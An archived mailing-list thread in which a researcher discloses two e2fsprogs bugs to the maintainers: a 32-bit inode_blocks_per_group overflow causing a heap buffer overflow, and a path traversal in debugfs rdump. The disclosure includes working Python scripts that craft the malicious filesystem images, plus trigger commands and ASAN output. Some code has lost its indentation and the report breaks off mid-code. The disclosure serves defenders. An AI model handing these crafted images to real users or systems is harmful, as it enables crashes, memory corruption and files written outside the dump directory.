> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length. ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.
For the aligned case, the overwrite check can now be skipped entirely.
For non-aligned cases, you can optimistically hold the read lock and then
use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.
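To make the false negative from the quoted description concrete, here is a toy Python model. It is a sketch under stated assumptions: extents are plain (start, length, allocated) tuples, `map_blocks` is a hypothetical stand-in for ext4_map_blocks() that returns at most one extent per call, and written versus unwritten state is not modelled. The looped variant is shown only for contrast and is not claimed to be what the RFC patch does.

```python
from typing import List, Tuple

Extent = Tuple[int, int, bool]  # (start_block, length, allocated)


def map_blocks(extents: List[Extent], lblk: int, length: int) -> Tuple[int, bool]:
    """Map at most one extent: return (mapped_len, allocated) at lblk."""
    for start, ext_len, allocated in extents:
        if start <= lblk < start + ext_len:
            return min(length, start + ext_len - lblk), allocated
    return 0, False


def overwrite_single_call(extents: List[Extent], lblk: int, length: int) -> bool:
    """One lookup: fails whenever the range straddles two extents."""
    mapped, allocated = map_blocks(extents, lblk, length)
    return allocated and mapped == length


def overwrite_looped(extents: List[Extent], lblk: int, length: int) -> bool:
    """Walk extent by extent until the range is covered or a hole is hit."""
    while length > 0:
        mapped, allocated = map_blocks(extents, lblk, length)
        if not allocated or mapped == 0:
            return False
        lblk += mapped
        length -= mapped
    return True


# Two adjacent allocated extents; the write covers blocks 2..5.
extents = [(0, 4, True), (4, 4, True)]
print(overwrite_single_call(extents, 2, 4), overwrite_looped(extents, 2, 4))
```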
* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC (permalink / raw)
To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org
[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]
Hi there,
I'd like to report two potential security bugs for your review.
detailed report and pocs attached.
Best,
Feng
[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]
#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.
Bug:
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.
Strategy:
- blocksize = 65536 (s_log_block_size = 6)
- inode_size = 16384 (power of 2, >= 128, <= blocksize)
- s_inodes_per_group = 0x40001 = 262145
- product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
- inode_blocks_per_group = ceil(16384 / 65536) = 1 (should be 65537!)
- Only 1 block (64K) of inode table is considered valid per group, but
the fs claims 262145 inodes per group. Accessing any inode beyond the
first 4 (65536/16384=4) triggers OOB reads from the inode table.
- The inode bitmap check requires inodes_per_group/8 <= blocksize.
262145/8 = 32768 <= 65536. Passes.
Crash chain (inode scan path):
1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
4. get_next_blocks returns num_blocks=0, bytes_left=0
5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
=> cast to size_t = huge value => heap buffer overflow
Trigger: debugfs crafted.img -R "lsdel"
(any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""
import struct
import sys
import os
import subprocess
# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT = 0x00 # __u32
OFF_BLOCKS_COUNT = 0x04 # __u32
OFF_R_BLOCKS_COUNT = 0x08 # __u32
OFF_FREE_BLOCKS_COUNT = 0x0C # __u32
OFF_FREE_INODES_COUNT = 0x10 # __u32
OFF_FIRST_DATA_BLOCK = 0x14 # __u32
OFF_LOG_BLOCK_SIZE = 0x18 # __u32
OFF_LOG_CLUSTER_SIZE = 0x1C # __u32
OFF_BLOCKS_PER_GROUP = 0x20 # __u32
OFF_CLUSTERS_PER_GROUP = 0x24 # __u32
OFF_INODES_PER_GROUP = 0x28 # __u32
OFF_MAGIC = 0x38 # __u16
OFF_STATE = 0x3A # __u16
OFF_REV_LEVEL = 0x4C # __u32
OFF_FIRST_INO = 0x54 # __u32
OFF_INODE_SIZE = 0x58 # __u16
OFF_FEATURE_COMPAT = 0x5C # __u32
OFF_FEATURE_INCOMPAT = 0x60 # __u32
OFF_FEATURE_RO_COMPAT = 0x64 # __u32
OFF_DESC_SIZE = 0xFE # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
OFF_CHECKSUM_TYPE = 0x175 # __u8
OFF_BLOCKS_COUNT_HI = 0x150 # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16
# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM = 0x0010
EXT4_FEATURE_RO_COMPAT_DIR_NLINK = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX = 0x0020
EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024
def read_u32(data, off):
    return struct.unpack_from('<I', data, off)[0]


def read_u16(data, off):
    return struct.unpack_from('<H', data, off)[0]


def write_u32(data, off, val):
    struct.pack_into('<I', data, off, val & 0xFFFFFFFF)


def write_u16(data, off, val):
    struct.pack_into('<H', data, off, val & 0xFFFF)


def write_u8(data, off, val):
    struct.pack_into('<B', data, off, val & 0xFF)


def create_crafted_image(path, size_mb=128):
"""Create a crafted ext4 image from scratch (no mke2fs dependency).
We write the superblock, group descriptor, and minimal structures
directly to bypass any tool-level validation.
"""
blocksize = 65536 # 64K blocks
log_block_size = 6 # 1024 << 6 = 65536
inode_size = 16384 # 16K inodes
inodes_per_group = 0x40001 # 262145
# 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
blocks_per_group = 1024
first_data_block = 0
blocks_count = blocks_per_group # 1 group
groups_cnt = 1
inodes_count = groups_cnt * inodes_per_group # 262145
# Verify the overflow
product = (inodes_per_group * inode_size) & 0xFFFFFFFF
inode_blocks_per_group = (product + blocksize - 1) // blocksize
correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize
print(f"\n=== Overflow Analysis ===")
print(f" blocksize = {blocksize}")
print(f" inode_size = {inode_size}")
print(f" inodes_per_group = {inodes_per_group} (0x{inodes_per_group:08X})")
print(f" true product = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
print(f" truncated product = {product} (0x{product:08X})")
print(f" inode_blocks_per_group (buggy) = {inode_blocks_per_group}")
print(f" inode_blocks_per_group (correct) = {correct_ibpg}")
print(f" groups_cnt = {groups_cnt}")
print(f" inodes_count = {inodes_count}")
# Verify openfs.c checks will pass:
# 1. s_log_block_size <= 6
assert log_block_size <= 6
# 2. inode_size >= 128, <= blocksize, power of 2
assert inode_size >= 128
assert inode_size <= blocksize
assert (inode_size & (inode_size - 1)) == 0
# 3. blocks_per_group >= 8
assert blocks_per_group >= 8
# 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
assert blocks_per_group <= 65528
# 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
max_ipg = 65536 - (blocksize // inode_size) # 65536 - 4 = 65532
assert inode_blocks_per_group <= max_ipg
# 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
assert (blocksize // 32) != 0
# 7. first_data_block < blocks_count
assert first_data_block < blocks_count
# 8. groups_cnt < 2^32
assert groups_cnt < (1 << 32)
# 9. groups_cnt * inodes_per_group == inodes_count
assert groups_cnt * inodes_per_group == inodes_count
# 10. Bitmap check: inodes_per_group / 8 <= blocksize
inode_bitmap_bytes = inodes_per_group // 8
# 262145 // 8 = 32768 (C integer division truncates the remainder).
# A bitmap covering every inode would need (262145 + 7) // 8 = 32769 bytes,
# but the check uses EXT2_INODES_PER_GROUP / 8, so 32768 <= blocksize passes.
assert (inodes_per_group // 8) <= blocksize, \
f"inode bitmap {inodes_per_group // 8} > blocksize {blocksize}"
print(" All validation checks pass!")
# Create the image
image_size = blocks_count * blocksize
print(f"\n Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
data = bytearray(image_size)
# === Write superblock at offset 1024 ===
sb_off = SUPERBLOCK_OFFSET
write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
write_u16(data, sb_off + OFF_STATE, 1) # EXT2_VALID_FS
write_u32(data, sb_off + OFF_REV_LEVEL, 1) # EXT2_DYNAMIC_REV
write_u32(data, sb_off + OFF_FIRST_INO, 11)
write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
write_u16(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)
# Feature flags: minimal. No 64bit, no metadata_csum, no journal.
feat_compat = 0 # nothing
feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
EXT2_FEATURE_RO_COMPAT_LARGE_FILE)
write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)
write_u16(data, sb_off + OFF_DESC_SIZE, 0)
write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)
# === Write Group Descriptor at block 1 ===
# Block 0 contains the superblock (at offset 1024 within the block).
# Block 1 is the group descriptor table.
gdt_off = 1 * blocksize # 65536
# bg_block_bitmap: block 2
# bg_inode_bitmap: block 3
# bg_inode_table: block 4 (only 1 block due to overflow!)
struct.pack_into('<I', data, gdt_off + 0x00, 2) # bg_block_bitmap
struct.pack_into('<I', data, gdt_off + 0x04, 3) # bg_inode_bitmap
struct.pack_into('<I', data, gdt_off + 0x08, 4) # bg_inode_table
struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6)) # bg_free_blocks_count
struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535)) # bg_free_inodes_count
struct.pack_into('<H', data, gdt_off + 0x10, 2) # bg_used_dirs_count
struct.pack_into('<H', data, gdt_off + 0x12, 0) # bg_flags
# === Write a minimal root inode (inode 2) in the inode table ===
# Inode table starts at block 4, offset = 4 * 65536 = 262144.
# Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
# Inode 1 is special "bad blocks" inode.
inode_table_off = 4 * blocksize
root_inode_off = inode_table_off + 1 * inode_size # inode 2
# Minimal inode: directory, mode=0755
i_mode = 0o40755 # S_IFDIR | 0755
struct.pack_into('<H', data, root_inode_off + 0x00, i_mode) # i_mode
struct.pack_into('<H', data, root_inode_off + 0x02, 0) # i_uid
struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
struct.pack_into('<H', data, root_inode_off + 0x1A, 2) # i_links_count
# Write the image
with open(path, 'wb') as f:
f.write(data)
print(f"\nImage written to: {path}")
return data
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <output_image>")
sys.exit(1)
output_path = sys.argv[1]
print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
data = create_crafted_image(output_path)
# Print superblock verification
print(f"\nSuperblock verification:")
sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
print(f" s_inodes_count = {struct.unpack_from('<I', sb, 0x00)[0]}")
print(f" s_blocks_count = {struct.unpack_from('<I', sb, 0x04)[0]}")
print(f" s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
print(f" s_log_block_size = {struct.unpack_from('<I', sb, 0x18)[0]}")
print(f" s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
print(f" s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
print(f" s_magic = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
print(f" s_rev_level = {struct.unpack_from('<I', sb, 0x4C)[0]}")
print(f" s_inode_size = {struct.unpack_from('<H', sb, 0x58)[0]}")
print(f" s_feature_compat = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
print(f" s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
print(f" s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")
# Show the overflow math
ipg = struct.unpack_from('<I', sb, 0x28)[0]
isz = struct.unpack_from('<H', sb, 0x58)[0]
bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
product_full = ipg * isz
product_trunc = product_full & 0xFFFFFFFF
ibpg_buggy = (product_trunc + bsz - 1) // bsz
ibpg_correct = (product_full + bsz - 1) // bsz
print(f"\n Overflow demonstration:")
print(f" {ipg} * {isz} = {product_full} (0x{product_full:X})")
print(f" truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
print(f" inode_blocks_per_group (buggy) = {ibpg_buggy}")
print(f" inode_blocks_per_group (correct) = {ibpg_correct}")
print(f" Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
print(f"\n With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
print(f" addressable in the inode table, but the FS claims {ipg}.")
print(f" Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")
if __name__ == '__main__':
main()
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]
#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.
Bug: debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.
Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.
Usage:
python3 craft_path_traversal.py output.img
debugfs output.img -R "rdump / /tmp/safe_dir"
# Result: file created at /tmp/traversal_proof (outside safe_dir)
"""
import struct
import sys
import subprocess
def create_base_image(path, size_mb=4):
    with open(path, 'wb') as f:
        f.write(b'\x00' * size_mb * 1024 * 1024)
    subprocess.run([
        'mke2fs', '-t', 'ext4', '-F',
        '-b', '1024',
        '-N', '128',
        '-O', '^has_journal,^extents',
        path
    ], check=True, capture_output=True)


def patch_traversal(img_path):
    """Add a directory entry with ../ in the name pointing to a regular file."""
    with open(img_path, 'r+b') as f:
        # Read superblock
        f.seek(1024)
        sb = f.read(1024)
        s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
        s_inode_size = struct.unpack_from('<H', sb, 88)[0]
        s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
        block_size = 1024 << s_log_block_size
        # Read group descriptor
        gd_offset = block_size * 2 if block_size == 1024 else block_size
        f.seek(gd_offset)
        gd = f.read(64)
        inode_table_block = struct.unpack_from('<I', gd, 8)[0]
        inode_table_offset = inode_table_block * block_size
        # Use inode 12 for a regular file with content
        target_ino = 12
        target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
        f.seek(target_offset)
        inode_data = bytearray(f.read(s_inode_size))
        # Set as regular file (mode 0100644)
        struct.pack_into('<H', inode_data, 0, 0o100644)
        struct.pack_into('<H', inode_data, 2, 0)  # uid
        # Content lives in a separate data block referenced by i_block[0]
        content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
        struct.pack_into('<I', inode_data, 4, len(content))  # i_size
        struct.pack_into('<H', inode_data, 26, 1)  # i_links_count
        # Allocate a data block for the file content
        # Use block 100 (should be free in a small fs)
        data_block = 100
        struct.pack_into('<I', inode_data, 40, data_block)  # i_block[0]
        struct.pack_into('<I', inode_data, 28, 2)  # i_blocks (in 512-byte sectors)
        f.seek(target_offset)
        f.write(inode_data)
        # Write content to the data block
        f.seek(data_block * block_size)
        f.write(content + b'\x00' * (block_size - len(content)))
        # Now add a directory entry in root with name "../../tmp/traversal_proof"
        # This will cause rdump to write outside the dump directory
        root_offset = inode_table_offset + (2 - 1) * s_inode_size
        f.seek(root_offset)
        root_inode = bytearray(f.read(s_inode_size))
        root_block = struct.unpack_from('<I', root_inode, 40)[0]
        dir_offset = root_block * block_size
        f.seek(dir_offset)
        dir_data = bytearray(f.read(block_size))
        # Find last entry and add our traversal entry
        pos = 0
        last_entry_pos = 0
        while pos < block_size:
            inode_num = struct.unpack_from('<I', dir_data, pos)[0]
            rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
            if rec_len == 0:
                break
            if inode_num != 0:
                last_entry_pos = pos
            next_pos = pos + rec_len
            if next_pos >= block_size:
                break
            pos = next_pos
        last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
        last_name_len = dir_data[last_entry_pos + 6]
        actual_last_size = ((8 + last_name_len + 3) // 4) * 4
        remaining = last_rec_len - actual_last_size
        # Path traversal name - goes up from /tmp/out3 to /tmp/
        entry_name = b'../../tmp/traversal_proof'
        new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4
        if remaining >= new_entry_size:
            struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
            new_pos = last_entry_pos + actual_last_size
            struct.pack_into('<I', dir_data, new_pos, target_ino)
            struct.pack_into('<H', dir_data, new_pos + 4, remaining)
            dir_data[new_pos + 6] = len(entry_name)
            dir_data[new_pos + 7] = 1  # file_type = regular
            dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name
            f.seek(dir_offset)
            f.write(dir_data)
            print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
        else:
            print(f"Not enough space (need {new_entry_size}, have {remaining})")
            sys.exit(1)
        # Mark inode 12 as used in bitmap
        inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
        f.seek(inode_bitmap_block * block_size)
        bitmap = bytearray(f.read(block_size))
        byte_idx = (target_ino - 1) // 8
        bit_idx = (target_ino - 1) % 8
        bitmap[byte_idx] |= (1 << bit_idx)
        f.seek(inode_bitmap_block * block_size)
        f.write(bitmap)
    print("Patched image with path traversal entry")
    print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
    print("Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output.img>")
        sys.exit(1)
    output = sys.argv[1]
    create_base_image(output)
    patch_traversal(output)


if __name__ == '__main__':
    main()
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]
# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow
## Summary
A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).
## Affected Component
- File: `lib/ext2fs/openfs.c`, line 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
additional `check_super_value` guard that catches this, so e2fsck is
NOT affected.
## Severity
**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.
## Root Cause
In `ext2fs_open2()`, the inode table size per group is computed as:
```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
```
`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16`, promoted to `int`). Under C's
usual arithmetic conversions the multiplication is carried out in
`unsigned int` (32-bit), so any product of 2^32 or more silently wraps
modulo 2^32.
The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.
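The truncation and the bypassed check can be reproduced with plain integer arithmetic. The following is a minimal Python sketch, not code from e2fsprogs: the helper names `ibpg_u32` and `ibpg_u64` are hypothetical, and the limit of 65532 is taken from the PoC's own comment (`65536 - blocksize // inode_size`), which is assumed here to mirror `EXT2_MAX_INODES_PER_GROUP` for these parameters.

```python
U32_MASK = 0xFFFFFFFF


def ibpg_u32(inodes_per_group, inode_size, block_size):
    """Model the computation in 32-bit unsigned arithmetic (wraps mod 2**32)."""
    total = (inodes_per_group * inode_size + block_size - 1) & U32_MASK
    return total // block_size


def ibpg_u64(inodes_per_group, inode_size, block_size):
    """Same computation without truncation (these values fit in 64 bits)."""
    return (inodes_per_group * inode_size + block_size - 1) // block_size


# Values from this report; MAX_LIMIT is an assumption (see the lead-in).
IPG, ISZ, BSZ = 262145, 16384, 65536
MAX_LIMIT = 65536 - BSZ // ISZ

buggy = ibpg_u32(IPG, ISZ, BSZ)
correct = ibpg_u64(IPG, ISZ, BSZ)
print(f"32-bit result: {buggy}, rejected by check: {buggy > MAX_LIMIT}")
print(f"64-bit result: {correct}, rejected by check: {correct > MAX_LIMIT}")
```

Under these assumptions the wrapped value slips under the limit, while the untruncated value would have been rejected.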
## Crash Chain
With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:
1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
`0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
65537).
2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
block (4 inodes worth of data).
3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
produces `bytes_left = -16384`.
4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
buffer overflow**.
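Steps 3 and 4 can be illustrated with a toy model. This sketch assumes a 64-bit `size_t` and deliberately simplifies the scan loop: `consume_inodes` and `as_size_t` are hypothetical helpers, not libext2fs functions, and they only track the byte counter described above.

```python
SIZE_T_BITS = 64  # assumption: LP64 platform


def as_size_t(value, bits=SIZE_T_BITS):
    """Reinterpret a signed integer as an unsigned size_t of the given width."""
    return value & ((1 << bits) - 1)


def consume_inodes(buffer_bytes, inode_size, count):
    """Subtract inode_size from a signed counter `count` times, with no lower bound."""
    bytes_left = buffer_bytes
    for _ in range(count):
        bytes_left -= inode_size
    return bytes_left


# One 64 KiB block holds 4 inodes of 16384 bytes; a 5th read underflows.
bytes_left = consume_inodes(65536, 16384, 5)
print(bytes_left)
print(hex(as_size_t(bytes_left)))
```

The negative counter is harmless as a signed `int`; it becomes dangerous only once it is passed where a `size_t` length is expected.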
## Proof of Concept
### ASAN crash output
```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
#0 __interceptor_memcpy
#1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
#2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
#3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
#4 do_lsdel /src/debugfs/lsdel.c:182
```
### Reproduction
```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
/src/debugfs/debugfs /work/t.img -R lsdel'
```
### PoC script
```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.
The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().
Values used:
blocksize = 65536 (s_log_block_size = 6)
s_inode_size = 16384 (power of 2, <= blocksize)
s_inodes_per_group = 262145 (0x40001)
Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys
def main():
    path = sys.argv[1]
    BLOCKSIZE = 65536
    LOG_BLOCK_SIZE = 6
    INODE_SIZE = 16384
    INODES_PER_GROUP = 262145
    BLOCKS_PER_GROUP = 1024
    BLOCKS_COUNT = 1024
    FIRST_DATA_BLOCK = 0
    GROUPS_COUNT = 1
    INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
    DESC_SIZE = 32
    img_size = BLOCKS_COUNT * BLOCKSIZE
    img = bytearray(img_size)
    # --- Superblock at offset 1024 ---
    sb_off = 1024
    struct.pack_into('<I', img, sb_off + 0, INODES_COUNT)       # s_inodes_count
    struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT)       # s_blocks_count_lo
    struct.pack_into('<I', img, sb_off + 20, FIRST_DATA_BLOCK)  # s_first_data_block
    struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE)    # s_log_block_size
    struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE)    # s_log_cluster_size
    struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP)  # s_blocks_per_group
    struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP)  # s_clusters_per_group
    struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP)  # s_inodes_per_group
    struct.pack_into('<H', img, sb_off + 56, 0xEF53)            # s_magic
    struct.pack_into('<H', img, sb_off + 58, 1)                 # s_state = VALID
    struct.pack_into('<H', img, sb_off + 62, 1)                 # s_minor_rev_level (offset 0x3E)
    struct.pack_into('<I', img, sb_off + 76, 1)                 # s_rev_level = DYNAMIC
    struct.pack_into('<H', img, sb_off + 88, INODE_SIZE)        # s_inode_size
    struct.pack_into('<I', img, sb_off + 96, 0x0002)            # s_feature_incompat = FILETYPE
    struct.pack_into('<I', img, sb_off + 100, 0x0003)           # s_feature_ro_compat
    struct.pack_into('<H', img, sb_off + 254, DESC_SIZE)        # s_desc_size
    # --- Group descriptor at block 1 ---
    gd_off = BLOCKSIZE
    inode_table_block = 3
    # pack_into() takes (format, buffer, offset, value); the buffer comes first.
    struct.pack_into('<I', img, gd_off + 0, 2)                  # bg_block_bitmap
    struct.pack_into('<I', img, gd_off + 4, 2)                  # bg_inode_bitmap
    struct.pack_into('<I', img, gd_off + 8, inode_table_block)  # bg_inode_table
    with open(path, 'wb') as f:
        f.write(img)
    product = INODES_PER_GROUP * INODE_SIZE
    truncated = product & 0xFFFFFFFF
    buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
    correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE
    print(f"Image: {path} ({img_size} bytes)")
    print(f" {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
    print(f" Truncated to 32-bit: {truncated} (0x{truncated:X})")
    print(f" inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
    print(f"Trigger: debugfs {path} -R lsdel")


if __name__ == '__main__':
    main()
```
## Suggested Fix
Use 64-bit arithmetic for the multiplication:
```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
```
Additionally, add a validation check after the computation:
```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
> (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
